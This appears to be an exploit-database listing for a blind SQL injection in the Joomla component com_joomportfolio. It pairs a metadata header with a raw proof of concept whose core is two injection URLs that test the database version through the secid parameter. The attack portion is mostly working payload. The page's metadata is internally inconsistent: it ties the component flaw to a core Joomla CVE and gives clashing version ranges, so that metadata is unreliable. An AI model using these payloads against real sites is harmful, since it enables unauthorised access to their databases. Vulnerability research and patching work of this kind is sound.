header-logo
Suggest Exploit
vendor:
Joomla
by:
Snakespc
9,3
CVSS
HIGH
Remote Blind Injection
89
CWE
Product Name: Joomla
Affected Version From: Joomla versions prior to 3.4.5
Affected Version To: Joomla versions prior to 3.4.5
Patch Exists: YES
Related CWE: CVE-2015-7297
CPE: a:joomla:joomla
Other Scripts: N/A
Platforms Tested: Windows, Linux, Mac
2015

Joomla com_joomportfolio Remote Blind Injection Vulnerability

A SQL injection vulnerability in Joomla! 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands.

Mitigation:

Upgrade to Joomla version 3.4.5 or later.
Source

Exploit-DB raw data:

==============================================================================
[»] Joomla com_joomportfolio Remote Blind Injection Vulnerability
==============================================================================
   
[»] Script:   [Joomla]
[»] Language: [ PHP ]
[»] Founder:  [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]
[»] Greetz to:[ sec-warTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]
   
###########################################################################
 ===[ Exploit ]===
   
[»] http://server/index.php?option=com_joomportfolio&task=showsec&Itemid=44&secid=1+AND SUBSTRING(@@version,1,1)=4 (no)
[»] http://server/index.php?option=com_joomportfolio&task=showsec&Itemid=44&secid=1+AND SUBSTRING(@@version,1,1)=5 (yes)
###########################################################################